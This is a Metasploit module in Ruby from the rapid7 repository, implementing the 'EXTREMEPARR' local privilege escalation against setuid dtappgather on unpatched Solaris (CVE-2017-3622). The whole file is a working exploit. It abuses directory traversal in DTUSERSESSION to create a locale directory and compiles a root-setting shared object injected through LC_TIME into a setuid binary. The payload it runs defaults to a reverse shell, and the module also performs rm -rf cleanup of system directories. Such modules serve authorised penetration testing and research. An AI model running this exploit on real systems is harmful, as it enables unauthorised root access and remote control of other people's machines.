GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/solaris/local/extremeparr_dtappgather_priv_esc.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
  # Local privilege escalation through the setuid `dtappgather` binary that
  # ships with CDE on unpatched Solaris (CVE-2017-3622, a.k.a. EXTREMEPARR).
  # The 'Description' metadata below carries the full write-up and the list
  # of releases this was tested against.  Needs an existing shell or
  # meterpreter session on the target.
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Solaris::Priv
  include Msf::Post::Solaris::System
  include Msf::Post::Solaris::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  # AutoCheck runs #check before #exploit so a host that does not look
  # vulnerable is left untouched unless the operator overrides it.
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata, datastore options and advanced options.
  #
  # @param info [Hash] extra module info merged in by the framework
  def initialize(info = {})
    super(update_info(info,
      'Name' => "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",
      'Description' => %q{
        This module exploits a directory traversal vulnerability in the
        `dtappgather` executable included with Common Desktop Environment (CDE)
        on unpatched Solaris systems prior to Solaris 10u11 which allows users
        to gain root privileges.

        dtappgather allows users to create a user-owned directory at any
        location on the filesystem using the `DTUSERSESSION` environment
        variable.

        This module creates a directory in `/usr/lib/locale`, writes a shared
        object to the directory, and runs the specified SUID binary with the
        shared object loaded using the `LC_TIME` environment variable.

        This module has been tested successfully on:

        Solaris 9u7 (09/04) (x86);
        Solaris 10u1 (01/06) (x86);
        Solaris 10u2 (06/06) (x86);
        Solaris 10u4 (08/07) (x86);
        Solaris 10u8 (10/09) (x86);
        Solaris 10u9 (09/10) (x86).
      },
      'References' =>
        [
          ['BID', '97774'],
          ['CVE', '2017-3622'],
          ['EDB', '41871'],
          ['URL', 'https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh'],
          ['URL', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html']
        ],
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [],
        'Reliability' => [],
        'AKA' => ['EXTREMEPARR'] },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Shadow Brokers', # exploit
          'Hacker Fantastic', # dtappgather-poc.sh
          'bcoles' # Metasploit
        ],
      'DisclosureDate' => '2017-04-24',
      'Privileged' => true,
      'Platform' => ['solaris', 'unix'],
      'Arch' => [ARCH_X86, ARCH_X64, ARCH_SPARC],
      'Targets' => [['Auto', {}]],
      'SessionTypes' => ['shell', 'meterpreter'],
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'solaris/x86/shell_reverse_tcp',
          'WfsDelay' => 10,
          'PrependFork' => true
        },
      'DefaultTarget' => 0))
    register_options [
      # Some useful example SUID executables:
      # * /usr/bin/at
      # * /usr/bin/cancel
      # * /usr/bin/chkey
      # * /usr/bin/lp
      # * /usr/bin/lpset
      # * /usr/bin/lpstat
      # * /usr/lib/lp/bin/netpr
      # * /usr/sbin/lpmove
      OptString.new('SUID_PATH', [true, 'Path to suid executable', '/usr/bin/at']),
      OptString.new('DTAPPGATHER_PATH', [true, 'Path to dtappgather executable', '/usr/dt/bin/dtappgather'])
    ]
    register_advanced_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  # @return [String] the SUID_PATH option: setuid executable run with LC_TIME set in #exploit
  def suid_bin_path
    datastore['SUID_PATH']
  end

  # @return [String] the DTAPPGATHER_PATH option: location of the dtappgather binary
  def dtappgather_path
    datastore['DTAPPGATHER_PATH']
  end

  # Create +path+ on the target with `mkdir -p` and register it for cleanup.
  # The path is single-quoted in the shell command; the only caller passes a
  # randomly generated name under WritableDir.
  #
  # @param path [String] directory to create on the target
  def mkdir(path)
    vprint_status "Creating directory '#{path}'"
    cmd_exec "mkdir -p '#{path}'"
    register_dir_for_cleanup path
  end

  # Write +data+ to +path+ on the target, replacing any existing file, and
  # register the file for cleanup.
  #
  # @param path [String] destination path on the target
  # @param data [String] file contents
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  # Upload C source as "#{path}.c" and compile it into a shared object at +path+.
  # PATH is extended with the SFW/CSW bin directories so gcc is found on
  # installs that keep it there.  Any output from the compiler is treated as
  # failure, so a warning aborts the module the same way an error does.
  # The .c file is registered for cleanup by #upload; the binary is registered here.
  #
  # @param path [String] output path for the compiled object
  # @param data [String] C source
  # @raise [Msf::Exploit::Failed] via fail_with when the compiler printed anything
  def upload_and_compile(path, data)
    upload "#{path}.c", data

    output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -fPIC -shared -g -lc -o #{path} #{path}.c"
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end

    register_file_for_cleanup path
  end

  # Replace +link_name+ with a symlink to +link_target+ and register the link
  # for cleanup.  Unlike #mkdir the arguments are not quoted; the only caller
  # passes two fixed absolute paths.
  #
  # @param link_target [String] path the link points at
  # @param link_name [String] path of the link itself
  def symlink(link_target, link_name)
    vprint_status "Symlinking #{link_target} to #{link_name}"
    rm_f link_name
    cmd_exec "ln -sf #{link_target} #{link_name}"
    register_file_for_cleanup link_name
  end

  # Decide whether the session's host looks vulnerable.
  #
  # Safe when either configured binary is not setuid, gcc is not installed, or
  # the kernel release falls outside 5.7..5.10 inclusive; Detected when the
  # release cannot be read; Appears otherwise.
  #
  # @return [CheckCode]
  def check
    # `return` inside the each block leaves #check itself, so the first
    # non-setuid binary short-circuits the whole check.
    [dtappgather_path, suid_bin_path].each do |path|
      unless setuid? path
        vprint_error "#{path} is not setuid"
        return CheckCode::Safe
      end
      vprint_good "#{path} is setuid"
    end

    unless has_gcc?
      vprint_error 'gcc is not installed'
      return CheckCode::Safe
    end
    vprint_good 'gcc is installed'

    # nil and '' both mean the release could not be determined.
    version = kernel_release
    if version.to_s.eql? ''
      vprint_error 'Could not determine Solaris version'
      return CheckCode::Detected
    end

    # SunOS 5.7 .. 5.10 correspond to Solaris 7 .. 10; #between? is inclusive.
    unless Rex::Version.new(version).between? Rex::Version.new('5.7'), Rex::Version.new('5.10')
      vprint_error "Solaris version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Solaris version #{version} appears to be vulnerable"

    CheckCode::Appears
  end

  # Run the escalation described in the module metadata.  Every path created
  # on the target is registered with FileDropper so an aborted run still gets
  # cleaned up at session close.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the session is already
  #   root, WritableDir is not writable, or the locale directory was not created
  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    # Remove appmanager directory and contents
    appmanager_path = '/var/dt/appconfig/appmanager'
    vprint_status "Cleaning appmanager directory #{appmanager_path}"
    cmd_exec "chmod -R 755 #{appmanager_path}/*"
    cmd_exec "rm -rf #{appmanager_path}/*"
    # NOTE(review): rm_f presumably maps to `rm -f`, which does not remove a
    # directory; confirm appmanager_path is in a state the later #symlink can
    # replace once the contents above are gone.
    rm_f appmanager_path

    # Create writable directory in /usr/lib/locale
    locale_path = '/usr/lib/locale'
    locale_name = rand_text_alphanumeric 5..10
    new_dir = "#{locale_path}/#{locale_name}"
    vprint_status "Creating directory #{new_dir}"
    depth = 3
    # NOTE(review): these two invocations use the literal /usr/dt/bin/dtappgather
    # rather than #dtappgather_path, so a non-default DTAPPGATHER_PATH only takes
    # effect for the third call below.
    cmd_exec "DTUSERSESSION=. /usr/dt/bin/dtappgather"
    depth.times do
      cmd_exec "DTUSERSESSION=.. /usr/dt/bin/dtappgather"
    end
    symlink locale_path, appmanager_path
    cmd_exec "DTUSERSESSION=#{locale_name} #{dtappgather_path}"
    # Verify the directory now exists by listing its parent.
    unless cmd_exec("ls -al #{locale_path} | grep #{locale_name}").to_s.include? locale_name
      fail_with Failure::NotVulnerable, "Could not create directory #{new_dir}"
    end

    print_good "Created directory #{new_dir}"
    register_dir_for_cleanup new_dir

    # Drop the symlink again; only the new locale directory is needed from here on.
    rm_f appmanager_path
    cmd_exec "chmod 755 #{new_dir}"

    # Upload and compile shared object
    base_path = "#{datastore['WritableDir']}/.#{rand_text_alphanumeric 5..10}"
    mkdir base_path

    payload_name = ".#{rand_text_alphanumeric 5..10}"
    payload_path = "#{base_path}/#{payload_name}"

    # Constructor runs when the object is loaded and hands off to the uploaded
    # payload at payload_path.
    so = <<-EOF
      void __attribute__((constructor)) cons() {
        setuid(0);
        setgid(0);
        execle("#{payload_path}", "", 0, 0);
        _exit(0);
      }
    EOF

    so_name = ".#{rand_text_alphanumeric 5..10}"
    so_path = "#{base_path}/#{so_name}"
    upload_and_compile so_path, so

    # Two copies under the locale directory, named after the locale with
    # .so.2 and .so.3 suffixes; each registered for cleanup separately.
    vprint_status "Writing shared objects to #{new_dir}"
    cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.2'"
    register_file_for_cleanup "#{new_dir}/#{locale_name}.so.2"
    cmd_exec "cp '#{so_path}' '#{new_dir}/#{locale_name}.so.3'"
    register_file_for_cleanup "#{new_dir}/#{locale_name}.so.3"

    # Upload and execute payload
    upload payload_path, generate_payload_exe
    cmd_exec "chmod +x #{payload_path}"

    print_status 'Executing payload...'
    # Backgrounded with a trailing `echo` so cmd_exec returns instead of
    # waiting on the spawned process; the trailing space is deliberate.
    cmd_exec "LC_TIME=#{locale_name} #{suid_bin_path} & echo "
  end
end